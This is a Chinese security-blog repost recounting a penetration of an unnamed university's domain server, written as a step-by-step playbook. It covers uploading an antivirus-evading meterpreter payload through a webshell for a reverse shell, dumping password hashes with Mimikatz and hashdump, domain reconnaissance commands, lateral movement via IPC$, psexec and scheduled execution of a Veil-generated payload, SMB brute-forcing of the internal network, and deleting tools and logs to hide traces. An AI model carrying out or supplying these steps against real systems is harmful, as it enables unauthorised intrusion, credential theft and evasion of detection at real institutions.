实战|渗透某高校域服务器

admin 2024年10月13日21:44:21评论23 views字数 2288阅读7分37秒阅读模式
实战|渗透某高校域服务器

扫码领资料

获黑客教程

免费&进群

实战|渗透某高校域服务器
实战|渗透某高校域服务器

一.SHELL反弹meterpreter

上传免杀的PAYLOAD到SHELL

(有时候会碰到EXE文件上传不了,可以使用powershell的meterpreter模块“XX.bat格式”来实现)

然后在菜刀或者WEBSHELL下面运行,反弹成功。

实战|渗透某高校域服务器

二.提权

反弹成功后第一步就是getuid看权限,然后尝试提权,有以下几种方法

1.利用漏洞模块提权,如ms15_05之类

2.令牌假冒

3.绕过Windows账户控制,比如Bypassuac提权

4.HASH攻击

如果服务器没有提权成功也不要紧,可以以此服务器为跳板,攻击内网其它服务器

实战|渗透某高校域服务器

好吧,我是system权限,就不用提权了,直接抓HASH吧!

1.使用WCE和MIMIKATZ(这2个工具必须要管理员的权限,而且注意工具的免杀)

2.使用MSF的hashdump模块,一个是hashdump,只能导出本地hash,另一个是smart_hashdump(必须是管理员权限),可以导出域用户的hash

3.使用Powershell模块直接导出

实战|渗透某高校域服务器

三.信息收集

1.ipconfig /all

http://2.net view /domain 查看有几个域

http://3.net view /domain:XXX 查看此域内电脑

http://4.net group /domain 查询域里面的组

http://5.net group “domain admins” /domain 查看域管理员

http://6.net group “domain controllers” /domain 查看域控制器

http://7.net group “enterprise admins” /domain 查看企业管理组

其他还有很多,网上可以一搜一大把,大家可以都试试

实战|渗透某高校域服务器

实战|渗透某高校域服务器

实战|渗透某高校域服务器

实战|渗透某高校域服务器

此时我们大概清楚了该内网的大概拓扑,知道域服务器是10.48.128.20

四.分析下一步攻击方向

分析下此时情况,我们已经获取了一个服务器的密码。

我们第一目标当然是域服务器

此时有二种情况,当前服务器可以连接域服务器和不可以连接域服务器

A.如果不能直接攻击域服务器,我们需要再攻击内网某个服务器,然后再攻击域服务器

1.我们可以利用抓到的密码加上我们收集的信息编个字典,然后添加路由进行弱口令的扫描

2.使用p**ec爆破整个局域网或者反弹meterpreter

3.利用smb_login模块扫描内网

4.利用当前权限,用WIN下面的P**ec进行内网渗透 

5.使用powershell对内网进行扫描(要求WIN7以上服务器)

6.架设socks4a,然后进行内网扫描

7.利用当前权限,进行内网IPC$渗透

B.可以直接攻击域服务器

五. 攻击域服务器

我们这次是可以直接攻击域服务器的,所以我们用最简单的方法IPC$渗透先试试

实战|渗透某高校域服务器

失败了

我们再用WIN下面的P**ec试试

实战|渗透某高校域服务器

又失败了,不应该啊,我们再仔细分析下,加上域名试试。

实战|渗透某高校域服务器

看,成功了,我们net use可以看到已经成功连接上了

Net use \ipc$

Copy sd.exe \ipc$ (其中sd.exe是VEIL生成的meterpreter)

Net time \ip

At \ip time c:sd.exe

具体看截图

实战|渗透某高校域服务器

实战|渗透某高校域服务器

然后exit到meterpreter,设置meterpreter>background,

设置监听,等待反弹

实战|渗透某高校域服务器

可以看到,已经反弹成功了,我们看下IP地址是不是域服务器的

实战|渗透某高校域服务器

我们已经成功的获取了域服务器的meterpreter,看下权限getuid

实战|渗透某高校域服务器

好吧,我们是system权限,就不用提权了,

为了使meterpreter shell更稳定和更隐蔽,

先把meterpreter shell程序进程迁移到EXPLORE进程

PS 获取一系列的运行进程,使用migrate PID ,然后KILL掉原来的进程

实战|渗透某高校域服务器

我们接下来抓HASH,

可以用Mimikatz也可以用run post/windows/gather/hashdump

PS:我们在用Mimikatz抓HASH之前要注意一点,

如果服务器是安装的64位操作系统,要把Mimikatz进程迁移到一个64位的程序进程中,才能查看64位系统密码明文。

32位系统没有这个限制,都可以查看系统密码.这里为了方便

我们使用hashdump来抓hash,run post/windows/gather/hashdump

实战|渗透某高校域服务器

失败了,权限不够,我们看下自己的权限

因为刚才迁移PAYLOAD进程时候,EXPLOR是administrator权限,我们getsystem,再抓,见图,成功了

实战|渗透某高校域服务器

六.SMB快速扩张控制权限

参照第4步,这里我们使用p**ec爆破内网或者利用smb_login模块爆破内网

1.msf 添加路由 route add ip mask sessionid

2.smb_login模块或者p**ec_scanner模块

实战|渗透某高校域服务器

实战|渗透某高校域服务器

查看爆破成功的机器 creds

实战|渗透某高校域服务器

最后我们看一下session控制图

实战|渗透某高校域服务器

七.擦PP

所有操作完成后,一定要记得清理下痕迹

1.删除所有使用的工具

2.删除所有操作记录

3.关闭所有的meterpreter

实战|渗透某高校域服务器

实战|渗透某高校域服务器

实战|渗透某高校域服务器

作者:shuteer  来源 :i春秋

学习更多黑客技能!体验靶场实战练习

实战|渗透某高校域服务器

黑客视频资料及工具

实战|渗透某高校域服务器

往期推荐

挖洞经验 | 如何发现更多的越权漏洞

黑客技能 | 在云服务器上搭建MSF生成APK木马连接手机

【代理池工具撰写】只有无尽的跳转,没有封禁的IP!

网友发了个钓鱼网站,我用 Python 渗透了该网站所有信息

挖到这个高危SSRF漏洞,我和我的小伙伴们都惊呆了!

实战|看我如何干掉裸聊APP

三步拿shell | 绕waf拿下赌博网站

原文始发于微信公众号(白帽子左一):实战|渗透某高校域服务器

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日21:44:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战|渗透某高校域服务器https://cn-sec.com/archives/956981.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息